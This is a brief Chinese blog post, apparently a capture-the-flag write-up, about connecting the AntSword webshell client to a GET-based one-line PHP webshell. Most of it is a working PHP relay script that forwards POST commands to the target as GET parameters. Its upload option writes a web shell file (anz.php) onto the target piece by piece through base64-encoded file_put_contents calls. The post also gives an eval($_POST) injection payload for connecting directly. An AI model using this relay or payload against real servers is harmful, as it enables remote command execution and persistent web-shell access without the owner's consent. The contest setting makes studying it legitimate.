好久没更新博客了,因为有些笔记写得确实难以入目,更多也是因为好久没静下心来学习了,等8月份忙完,会把一些还像人话的笔记整理一下,一起发上来。前天,做到新生赛的一个弱智RCE的时候,看到他本质就是一个一句话木马的时候,想到了用蚁剑去连。但是,里面是用$_GET,传入的密码,蚁剑连上也是空。想了很多弱智方法都连不上。这时,一位甜菜出现了。

只要把POST改为GET请求即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
highlight_file(__FILE__);
ini_set('max_execution_time', '100'); // 超时时间

$url = 'http://localhost/test/rce.php'; // 一句话地址
$pass = '2'; // 密码
$data = $_POST['cmd']; // 中转密码

echo file_get_contents($url.'?'.$pass.'='.$data);

if(isset($_GET['upload'])){
$f = fopen('darkshell.php','r'); // 上传文件
while (!feof($f)){
$content = base64_encode(fgetc($f));
$exec = "file_put_contents('anz.php',base64_decode('$content'),FILE_APPEND);";
file_get_contents($url.'?'.$pass.'='.$exec);
}
echo 'File uploaded successfully';
}
?>

当然了,那道题的构造完全也可以是

1
?kevin=eval($_POST['k']);

直接用蚁剑连,密码k

特此鸣谢,Anz这位甜菜